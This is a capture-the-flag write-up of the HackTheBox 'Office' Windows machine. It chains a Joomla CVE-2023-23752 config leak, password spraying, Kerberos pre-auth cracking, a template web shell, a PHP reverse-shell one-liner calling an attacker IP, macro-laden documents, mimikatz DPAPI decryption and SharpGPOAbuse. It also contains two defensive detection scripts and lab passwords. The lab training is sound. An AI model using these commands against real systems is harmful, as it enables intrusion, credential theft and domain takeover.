HTB | Office

This is a Windows box. You can find it here.

Skills Learned

  • Joomla Web Service Abuse

  • CVE-2023-23752

  • WireShark Packet Filtering

  • RunasCs

  • LibreOffice Registry Security

  • DPAPI

  • Abusing MS-BKRP (BackupKey Remote Protocol) for Password Decryption

  • GPO Abuse (via SharpGPOAbuse.exe)

NMAP

IP: 10.10.11.3

Port 53

dig any @10.10.11.3 office.htb

From the ANY query we can identify the following names:

  • office.htb

  • dc.office.htb

  • hostmaster.office.htb

Let's add these to /etc/hosts.

Let's try a zone transfer for the office.htb zone (the original command lacked the zone name, which is required for AXFR), but the transfer is refused:

dig axfr @10.10.11.3 office.htb

LDAP

ldapsearch -H ldap://10.10.11.3 -x -s base namingcontexts
ldapsearch -H ldap://10.10.11.3 -x -b "DC=office,DC=htb"

Nothing interesting was found with ldapsearch.

SMB 445

netexec confirms the hostname and domain:

netexec smb 10.10.11.3

Unauthenticated enumeration is not possible: guest, a bogus account and a null password all fail.

netexec smb 10.10.11.3 -u guest -p ''
netexec smb 10.10.11.3 -u test -p test
netexec smb 10.10.11.3 -u test -p ''

Port 80

Let's visit port 80

dirsearch

dirsearch -u http://office.htb/ -x 403,404

Let's visit /robots.txt

The website runs Joomla. We can find its version in the manifest at http://office.htb/administrator/manifests/files/joomla.xml

It is version 4.2.7.

Let's look for an exploit affecting that version.

Foothold/shell

Auth as dwolfe

Leak Password

I found CVE-2023-23752. According to the blog post, CVE-2023-23752 is an authentication bypass in the Joomla web services API resulting in an information leak: the application configuration (including database credentials) can be read without authentication by adding public=true to the request. We can do this with curl:

curl -v http://office.htb/api/index.php/v1/config/application?public=true

or simply by visiting that URL in the browser.

From the response we find the password H0lOgrams4reTakIng0Ver754! (the database password from the Joomla config). That password did not work anywhere on its own.
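From the defender's side, the useful thing to know about this leak is what it looks like in the web server log: a request to /api/index.php/v1/config/application with ?public=true answered with a 200. The script below is an added example, not part of the original writeup; the access log lines in it are constructed (combined log format as XAMPP's Apache would write it, IPs and timestamps invented) and the 401 on the patched-server line is an assumption about how a fixed Joomla answers. It scans a log, groups the config-endpoint requests by source and reports whether the configuration was actually served, and also notes whether the same source first fetched joomla.xml, the version-probe step used above.

```python
import re
from collections import defaultdict

# Constructed sample access log (combined format); not taken from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Mar/2024:10:01:02 +0000] "GET /administrator/manifests/files/joomla.xml HTTP/1.1" 200 1842 "-" "curl/8.5.0"
10.10.14.5 - - [10/Mar/2024:10:01:09 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2311 "-" "curl/8.5.0"
10.10.14.5 - - [10/Mar/2024:10:01:15 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 2311 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Mar/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
192.0.2.11 - - [10/Mar/2024:10:03:30 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 76 "-" "python-requests/2.31"
"""

# Combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoint exposed by CVE-2023-23752 (any request to it, with or without the query string,
# is worth a look; a 200 means the config was handed out).
CONFIG_ENDPOINT_RE = re.compile(r'^/api/index\.php/v1/config/application(\?|$)')
# The manifest that reveals the Joomla version, commonly fetched just before the API request.
VERSION_PROBE_RE = re.compile(r'^/administrator/manifests/files/joomla\.xml')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['status'] = int(rec['status'])
    return rec


def find_config_leak_attempts(log_text):
    """Per source IP: how often the config endpoint was requested, how many of those
    requests were answered 200 (config served), and whether the version was probed."""
    per_ip = defaultdict(lambda: {'attempts': 0, 'served': 0, 'version_probe': False})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per_ip[rec['ip']]
        if VERSION_PROBE_RE.match(rec['path']):
            entry['version_probe'] = True
        elif CONFIG_ENDPOINT_RE.match(rec['path']):
            entry['attempts'] += 1
            if rec['status'] == 200:
                entry['served'] += 1
    # Only sources that touched the config endpoint are findings.
    return {ip: e for ip, e in per_ip.items() if e['attempts'] > 0}


if __name__ == '__main__':
    for ip, e in find_config_leak_attempts(SAMPLE_LOG).items():
        print(f"{ip}: {e['attempts']} request(s), {e['served']} served, "
              f"version probe first: {e['version_probe']}")
```

The fix for the underlying issue is updating Joomla (the vendor shipped the patch in 4.2.8); the log check above tells you whether anyone already pulled the configuration before that happened, in which case the database password it contains should be rotated.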

Generate User List

Since we have a password but no username, let's use kerbrute to enumerate valid usernames against the KDC:

./kerbrute userenum --dc 10.10.11.3 -d office.htb /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt -t 100

Password Spray

Now that we have a list of valid usernames and a password, we can password-spray (username below is the list of names kerbrute reported as valid):

netexec smb 10.10.11.3 -u username -p 'H0lOgrams4reTakIng0Ver754!' --continue-on-success

There’s a hit on dwolfe. No matches on WinRM:

RCE as web_account

Enumeration

netexec smb 10.10.11.3 -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' --shares

There is a pcap file in the SOC Analysis share:

Latest-System-Dump-8fbc124d.pcap

I will download the file and open it in Wireshark for analysis

Open Statistics -> Endpoints.

Looks like 10.250.0.0/24 is the internal network.

Most of the traffic involves 10.250.0.30.

Kerberos

Now let's analyse the conversations (Statistics -> Conversations). Here we can see a conversation between 10.250.0.41 and 10.250.0.30 over port 88, which is almost certainly Kerberos authentication.

We can see two AS-REQ requests from 10.250.0.41.

The first request carries no pre-authentication data (the KDC answers it with KRB5KDC_ERR_PREAUTH_REQUIRED), but the second one does.

That second packet includes a timestamp encrypted with a key derived from the tstark user's password (PA-ENC-TIMESTAMP), which is what makes an offline guess possible.

Crack Hash

I found this article, which shows how to get passwords from Kerberos pre-authentication packets.

I will now build the hash from the encrypted timestamp in the capture.

Now I will use hashcat to crack it (mode 19900 is Kerberos 5 etype 18 pre-auth, i.e. AES256 as in this capture):

hashcat -m 19900 tstark_hash /home/anurag/stuff/rockyou.txt

This password only worked for SMB, and the shares contained nothing new for tstark.

It did, however, work on the Joomla website with the administrator username.

RCE

I'll click on System and select "Site Templates", then "Cassiopeia Details and Files". I'll edit index.php, first changing only a comment to make sure I have write permission (I do).

Now I will add a web shell to index.php (refer to revshell.com).

And it works.

I tried php -r '$sock=fsockopen("10.10.14.5",1234);system("sh<&3 >&3 2>&3");' for a reverse shell, but the connection was closed as soon as it was established.

Shell as TSTARK

Upload RunasCs

Now I'll try to get a shell as tstark directly, and for that I will use RunasCs. I'll host RunasCs on my Python web server and download it to C:\ProgramData:

We can cross-check that r.exe was copied.

Shell

I’ll send ?cmd=C:\programdata\r.exe tstark playboy69 cmd.exe -r 10.10.14.5:1234, and I get a shell:

Here I find user.txt.

Priv Esc

Shell as PPotts

Let's look at what privileges tstark has and which groups the user belongs to:

whoami /priv
whoami /groups

Here we can see tstark is a member of the OFFICE\Registry Editors group.

That’s a custom group for Office, but it seems to imply that TStark can edit at least parts of the registry.

Internal Website - port 8083

In C:\xampp\apache\conf\httpd.conf, I’ll find the setup of the virtual host for this site:

The applications directory is empty, but it is owned by the PPotts user, and web_account has access to write to it:

Since port 8083 is only listening internally, I will upload chisel to the Office box:

wget 10.10.14.5:80/chisel_1.10.1_windows_amd64 -OutFile c.exe

First start the chisel server on my host:

./chisel server --port 8000 --reverse

Then connect back from the box, publishing its local port 8083 on my port 8083:

PS C:\ProgramData> .\c.exe client 10.10.14.5:8000 R:8083:127.0.0.1:8083

Now I can visit http://127.0.0.1:8083

There is a page /resume.php where we can upload a resume.

I tried uploading test.txt but got an error.

With an allowed extension the file is accepted. Let's try test.odt.

Shell via Macros

This wiki page documents the MacroSecurityLevel registry key that shows the current settings:

Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"

Based on that page, value 3 is "Very high" (macros never run), so we have to lower it to 0 ("Low", macros run without prompting).

The ACL on this key shows that the Registry Editors group has Full Control, which is why tstark can change it:

(Get-ACL HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel).Access

I'll update the value to 0

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" -Name "Value" -Value 0
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel"

Create a Malicious Document

I will use msfconsole to generate the .odt file.

Now I will start the handler and upload msf.odt on the website.

We have to re-check the MacroSecurityLevel value before uploading, because it gets reset to 3 after some time.

After a short wait we have a meterpreter shell,

and we are PPotts.

Shell as hhogan

cmdkey /list shows the credentials saved for the current account:

Here we can see a stored credential entry for the user hhogan (the password itself is not displayed; it is protected by DPAPI).

And hhogan is a member of GPO Managers.

The credential blobs themselves are stored, DPAPI-protected, here:

gci -force AppData\Roaming\Microsoft\Credentials

The master keys that protect those blobs are stored here:

gci -force AppData\Roaming\Microsoft\Protect

Decrypt Credential — Decrypt Master Key

The challenge is that the master key is encrypted with the user’s password, and I don’t have it. Fortunately, there’s a blog post from SpecterOps that shows how to decrypt without the password, using an RPC called MS-BKRP (BackupKey Remote Protocol). To abuse this I’ll use the /rpc flag in Mimikatz.

Let's upload mimikatz to the box

Now we have to get the key

.\mimikatz.exe "dpapi::masterkey /in:C:\users\ppotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc" exit

The decrypted master key is printed at the end. Now let's try this key on all three credential blobs.

The first one is for MyUser

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\18A1927A997A794B65E9849883AC3F3E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

second is for hhogan

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

And the third one gives an error:

.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\E76CCA3670CD9BB98DF79E0A8D176F1E /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit

Now we have hhogan's credential; let's use it over WinRM.

WinRM

The credential works for both SMB and WinRM:

Now use evil-winrm to get a shell.

Shell as Administrator

Since hhogan is a member of GPO Managers, we can list the GPOs:

Get-GPO -All | Select-Object DisplayName

GPO Abuse

To abuse the GPO I will use SharpGPOAbuse; I downloaded the exe from its repo.

Let's upload the exe.

Let's start with the first GPO:

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Windows Firewall GPO"

It is not writable by hhogan, so let's try the second one:

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"

We were able to abuse the second group policy "Default Domain Policy" to add hhogan as new local admin.

This doesn’t take effect until the GPO refreshes. HHogan has permission to run gpupdate /force which will make that happen now:

And hhogan is now a local administrator (the Default Domain Policy applies to the DC itself).

After reconnecting I was able to get root.txt.
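What SharpGPOAbuse's --AddLocalAdmin does under the hood is write a Restricted Groups entry into the GPO's GptTmpl.inf in SYSVOL (under MACHINE\Microsoft\Windows NT\SecEdit\), so the pushed membership is visible to anyone who reads that file. The script below is an added example, not part of the original writeup or of SharpGPOAbuse: it parses the [Group Membership] section of a GptTmpl.inf and reports members being pushed into privileged built-in groups (Administrators S-1-5-32-544, Backup Operators S-1-5-32-551, Remote Management Users S-1-5-32-580) that are not in an expected baseline. The sample file is constructed; the exact way SharpGPOAbuse formats the member (plain name versus SID) is an assumption, which is why the parser accepts both. A defender would run this against every GPO in SYSVOL after an alert such as event 5136 on a groupPolicyContainer object or a change to the Default Domain Policy's version number.

```python
# Constructed sample GptTmpl.inf (Restricted Groups). In a real domain this file lives in
# \\<dc>\SYSVOL\<domain>\Policies\{GUID}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
SAMPLE_GPTTMPL = """\
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = HHogan
*S-1-5-32-555__Memberof =
*S-1-5-32-555__Members = *S-1-5-21-1199398058-4196589450-691661856-513
"""

# Well-known built-in group SIDs (fixed across all Windows installs).
WELL_KNOWN = {
    'S-1-5-32-544': 'Administrators',
    'S-1-5-32-551': 'Backup Operators',
    'S-1-5-32-555': 'Remote Desktop Users',
    'S-1-5-32-580': 'Remote Management Users',
}
# Groups whose membership change is a privilege escalation on every machine the GPO hits.
PRIVILEGED = {'S-1-5-32-544', 'S-1-5-32-551', 'S-1-5-32-580'}


def parse_group_membership(text):
    """Return {group_sid_or_name: [members]} from the [Group Membership] section.
    Only '__Members' keys are collected: they *replace* the group's membership on the
    target machines. '__Memberof' keys (nest this group elsewhere) are ignored here."""
    section, result = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].lower()
            continue
        if section != 'group membership' or '=' not in line:
            continue
        key, _, value = line.partition('=')
        key = key.strip()
        if not key.endswith('__Members'):
            continue
        # Keys look like *S-1-5-32-544__Members; SIDs are prefixed with '*', names are not.
        group = key[:-len('__Members')].lstrip('*')
        members = [m.strip().lstrip('*') for m in value.split(',') if m.strip()]
        result[group] = members
    return result


def find_privileged_additions(text, expected=None):
    """List (group_name, member) pairs the GPO pushes into a privileged built-in group
    beyond the expected baseline ({group_sid: [members]}). Comparison is case-insensitive."""
    expected = expected or {}
    findings = []
    for group, members in parse_group_membership(text).items():
        if group not in PRIVILEGED:
            continue
        baseline = {e.lower() for e in expected.get(group, [])}
        name = WELL_KNOWN.get(group, group)
        for member in members:
            if member.lower() not in baseline:
                findings.append((name, member))
    return findings


if __name__ == '__main__':
    for group, member in find_privileged_additions(SAMPLE_GPTTMPL):
        print(f"GPO pushes '{member}' into local group '{group}'")
```

For the Default Domain Policy the baseline is empty, since a stock one carries no Restricted Groups section at all, so any __Members line there is a finding on its own. The durable fix is the one the box illustrates in reverse: GPO edit rights on a policy linked to the domain controllers are effectively domain admin rights, and should be held only by accounts treated as such.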
